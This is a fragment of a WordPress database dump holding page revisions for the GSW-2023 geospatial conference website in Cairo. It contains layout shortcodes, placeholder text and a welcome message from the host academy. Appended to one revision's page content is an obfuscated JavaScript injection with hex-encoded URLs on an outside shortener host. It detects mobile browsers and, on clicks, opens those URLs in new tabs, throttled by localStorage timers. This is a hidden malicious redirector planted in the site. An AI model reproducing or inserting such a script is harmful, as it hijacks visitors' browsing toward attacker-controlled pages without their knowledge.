title_font_line_height=\"desktop:28px;\"][/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon=\"icomoon-fontawesome-16x16-gem\" icon_size=\"24\" icon_color=\"\" title=\"Cost effective\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518233084{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-check-square\" icon_size=\"24\" icon_color=\"\" title=\"Transparent &amp; honest\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518135334{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-lightbulb\" icon_size=\"24\" icon_color=\"\" title=\"Creative\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518683161{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"``The time is always right to do what is right!``\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529525768333{padding-top: 70px !important;padding-bottom: 75px !important;}\"][vc_column offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Our latest projects\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"]We provides a full spectrum s nisi lectus, pharetra eget leo id, hendrerit ultricies magna. Duis bibendum quam in elit accumsan venenatis.[/ultimate_heading][/vc_column][vc_column offset=\"vc_col-lg-offset-0 vc_col-lg-12 vc_col-md-offset-0 vc_col-md-12\"][dt_portfolio_carousel dis_posts_total=\"12\" content_alignment=\"center\" custom_content_bg_color=\"#f7f7f7\" post_content_paddings=\"20px 30px 30px 30px\" resized_image_dimensions=\"3x2\" image_border_radius=\"0px\" image_paddings=\"20px 20px 0px 20px\" slides_on_wide_desk=\"3\" slides_on_lapt=\"2\" slides_on_h_tabs=\"2\" slides_on_v_tabs=\"1\" post_title_font_size=\"22px\" post_title_line_height=\"32px\" post_date=\"n\" post_author=\"n\" post_comments=\"n\" post_content=\"off\" read_more_button=\"default_button\" read_more_button_text=\"Details\" project_icon_border_width=\"0px\" project_icon_color=\"#ffffff\" project_icon_color_hover=\"#ffffff\" next_icon=\"icon-ar-013-r\" prev_icon=\"icon-ar-013-l\" arrow_icon_size=\"32px\" arrow_bg_width=\"36x\" arrow_border_width=\"0px\" arrow_icon_color=\"rgba(0,0,0,0.15)\" arrows_bg_show=\"n\" arrow_icon_color_hover=\"\" arrows_bg_hover_show=\"n\" r_arrow_icon_paddings=\"0px 0px 0px 0px\" r_arrow_v_offset=\"0px\" l_arrow_icon_paddings=\"0px 0px 0px 0px\" l_arrow_v_offset=\"0px\" category=\"\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"Have a project you\'d like to talk about?\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Sed consequat erat vitae odio placerat, vel malesuada mi convallis we can help![/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527107907{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]VIEW SHOWCASE[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]I am text block. Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUzRUFzJTIwd2UlMjBjZWxlYnJhdGUlMjBvdXIlMjA1MHRoJTIwYW5uaXZlcnNhcnklMkMlMjB0aGUlMjBBcmFiJTIwQWNhZGVteSUyMGZvciUyMFNjaWVuY2UlMkMlMjBUZWNobm9sb2d5JTJDJTIwYW5kJTIwTWFyaXRpbWUlMjBUcmFuc3BvcnQlMjAlMjhBQVNUTVQlMjklMjBpcyUyMGhvbm9yZWQlMjB0byUyMGhvc3QlMjB0aGUlMjBJU1BSUyUyMGZpcnN0JTIwR2Vvc3BhdGlhbCUyMFdlZWslMjBpbiUyMEFmcmljYSUyMGFuZCUyME1pZGRsZSUyMEVhc3QlMjBpbiUyMDIwMjMlMjAlMjhHU1ctMjAyMyUyOSUyMHRoYXQlMjB3aWxsJTIwYmUlMjBoZWxkJTIwdW5kZXIlMjB0aGUlMjBhdXNwaWNlcyUyMG9mJTIwSC5FJTIwU2VjcmV0YXJ5LUdlbmVyYWwlMjBvZiUyMHRoZSUyMExlYWd1ZSUyMG9mJTIwQXJhYiUyMFN0YXRlcy4lMjBUaGUlMjBjb25mZXJlbmNlJTIwd2lsbCUyMGJlJTIwaGVsZCUyMGluJTIwU2VwdGVtYmVyJTIwMjAyMyUyQyUyMGF0JTIwdGhlJTIwSW50ZXJDb250aW5lbnRhbCUyMENhaXJvJTIwQ2l0eSUyMHN0YXJzJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lMjBBQVNUTVQlMjBzdHJvbmdseSUyMGJlbGlldmVzJTIwdGhhdCUyMHNjaWVuY2UlMjBpcyUyMHRoZSUyMGtleSUyMHRvJTIwdGhlJTIwZnV0dXJlJTIwYW5kJTIwdGhlJTIwY29ybmVyc3RvbmUlMjBmb3IlMjBuYXRpb25zJTI3JTIwcHJvZ3Jlc3MlMjBhbmQlMjBwcm9zcGVyaXR5LiUyMEl0JTIwaXMlMjB0aGUlMjBwcmltYXJ5JTIwZmFjdG9yJTIwZm9yJTIwaHVtYW4lMjBhY2hpZXZlbWVudHMlMjB0aHJvdWdob3V0JTIwYWxsJTIwYWdlcy4lMjBBQVNUTVQlMjBoYXMlMjBhJTIwaG9zdCUyMG9mJTIwcXVhbGlmaWVkJTIwcHJvZmVzc29ycyUyMGFuZCUyMGV4cGVydHMlMjB3aG8lMjBhcmUlMjBjYXBhYmxlJTIwb2YlMjBzdXBwb3J0aW5nJTIwQXJhYiUyMGFuZCUyMEFmcmljYW4lMjBjb3VudHJpZXMlMjBpbiUyMHZhcmlvdXMlMjBzY2llbnRpZmljJTIwZmllbGRzLiUyMFRoZSUyMEdTVyUyMHdpbGwlMjBwcm92aWRlJTIwYSUyMHBsYXRmb3JtJTIwZm9yJTIwaW50ZXJuYXRpb25hbCUyMHNjaG9sYXJzJTJDJTIwZ3JhZHVhdGUlMjBzdHVkZW50cyUyQyUyMGZ1dHVyZSUyMHNjaWVudGlzdHMlMjBhbmQlMjBpbmR1c3RyaWFsJTIwc2VjdG9ycyUyMHRvJTIwbGVhcm4lMjBleGNoYW5nZSUyMGtub3dsZWRnZSUyMGFuZCUyMGV4cGVyaWVuY2VzJTIwb2YlMjBhcHBseWluZyUyMGdlb3NwYXRpYWwlMjB0ZWNobm9sb2dpZXMlMjBmb3IlMjBzdXN0YWluYWJsZSUyMGRldmVsb3BtZW50JTIwZm9yJTIwYmV0dGVyJTIwcXVhbGl0eSUyMG9mJTIwbGlmZSUyMGZvciUyMHBlb3BsZSUyMGFyb3VuZCUyMHRoZSUyMHdvcmxkLiUyMFdlJTIwd291bGQlMjBsaWtlJTIwdG8lMjB0YWtlJTIwdGhpcyUyMG9wcG9ydHVuaXR5JTIwdG8lMjB3ZWxjb21lJTIweW91JTIwdG8lMjBDYWlybyUyMGElMjB2aWJyYW50JTJDJTIwZXhoaWxhcmF0aW5nJTJDJTIwZXhvdGljJTJDJTIwZmFzY2luYXRpbmclMjBhbmQlMjB3ZWxjb21pbmclMjBjaXR5LiUyMEhvbWUlMjB0byUyMHRoZSUyMGJlc3QlMjBQaGFyYW9uaWMlMkMlMjBDb3B0aWMlMjBhbmQlMjBJc2xhbWljJTIwc2lnaHRzJTIwaW4lMjBFZ3lwdC4lMjBDYWlybyUyMGlzJTIwd2hlcmUlMjB5b3UlMjBuZXZlciUyMGtub3clMjB3aGF0JTIwaW5jcmVkaWJsZSUyQyUyMGhhbGYtZm9yZ290dGVuJTIwbW9udW1lbnQlMjB5b3UlMjBtaWdodCUyMHN0dW1ibGUlMjBhY3Jvc3MlMjB3aGlsZSUyMHdhbmRlcmluZyUyMGFyb3VuZC4lMjBFbmpveSUyMHRoZSUyME5pbGUlMjB2aWV3JTJDJTIwdmlzaXQlMjB0aGUlMjBncmVhdCUyMHB5cmFtaWRzJTIwb2YlMjBHaXphJTJDJTIwd2FsayUyMHRocm91Z2glMjB0aGUlMjBjYXBpdGFsJTI3cyUyMG1lZGlldmFsJTIwbWFya2V0cyUyMGJ5JTIwS2hhbiUyMEVsLUtoYWxpbGklMkMlMjBvciUyMHdhbGslMjBkb3duJTIwdGhlJTIwTmlsZSUyMHByb21lbmFkZS4lMjBXZSUyMGxvb2slMjBmb3J3YXJkJTIwdG8lMjB3b3JraW5nJTIwd2l0aCUyMHRoZSUyMElTUFJTJTIwY291bmNpbCUyQyUyMGNvbW1pc3Npb25zJTIwcHJlc2lkZW50cyUyQyUyMHdvcmtpbmclMjBncm91cCUyMG9mZmljZXJzJTJDJTIwYW5kJTIwb3RoZXIlMjBzaXN0ZXIlMjBvcmdhbml6YXRpb25zJTIwdG8lMjBoYXZlJTIwYSUyMHN1Y2Nlc3NmdWwlMjB0ZWNobmljYWwlMjBwcm9ncmFtJTIwYW5kJTIwYSUyMG1lbW9yYWJsZSUyMHNvY2lhbCUyMHByb2dyYW0uJTIwSXQlMjBpcyUyMGdyZWF0JTIwdG8lMjBoYXZlJTIwdGhlJTIwR1NXJTIwY29taW5nJTIwdG8lMjBFZ3lwdCUyMHdoZXJlJTIwbW9zdCUyMHByb2JhYmx5JTIwdGhlJTIwZmlyc3QlMjBtYXBwaW5nJTIwc3lzdGVtcyUyMHdlcmUlMjBkZXZlbG9wZWQlMjAxMDAwcyUyMHllYXJzJTIwYWdvLiUyMFdlbGNvbWUlMjB0byUyMEdTVyUyNzIwMjMlMjBpbiUyMENhaXJvJTJDJTIwRWd5cHQuJTNDYnIlMkYlM0VDbGljayUyMGVkaXQlMjBidXR0b24lMjB0byUyMGNoYW5nZSUyMHRoaXMlMjBodG1sJTNDJTJGcCUzRQ==[/vc_raw_html][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-05 17:47:55','2022-10-05 17:47:55','',2167,'https://gsw2023.com/?p=2291',0,'revision','',0),
(2292,1,'2022-10-05 17:49:14','2022-10-05 17:49:14','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"]</p>\n<h5>As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. It is the primary factor for human achievements throughout all ages. AASTMT has a host of qualified professors and experts who are capable of supporting Arab and African countries in various scientific fields. The GSW will provide a platform for international scholars, graduate students, future scientists and industrial sectors to learn exchange knowledge and experiences of applying geospatial technologies for sustainable development for better quality of life for people around the world. We would like to take this opportunity to welcome you to Cairo a vibrant, exhilarating, exotic, fascinating and welcoming city. Home to the best Pharaonic, Coptic and Islamic sights in Egypt. Cairo is where you never know what incredible, half-forgotten monument you might stumble across while wandering around. Enjoy the Nile view, visit the great pyramids of Giza, walk through the capital\'s medieval markets by Khan El-Khalili, or walk down the Nile promenade. We look forward to working with the ISPRS council, commissions presidents, working group officers, and other sister organizations to have a successful technical program and a memorable social program. It is great to have the GSW coming to Egypt where most probably the first mapping systems were developed 1000s years ago. Welcome to GSW\'2023 in Cairo, Egypt.</h5>\n<p>[/ultimate_heading][vc_row_inner][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row equal_height=\"yes\" content_placement=\"middle\" bg_type=\"bg_color\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529517572787{padding-top: 70px !important;padding-bottom: 55px !important;}\" bg_color_value=\"rgba(170,170,170,0.1)\"][vc_column offset=\"vc_col-lg-offset-2 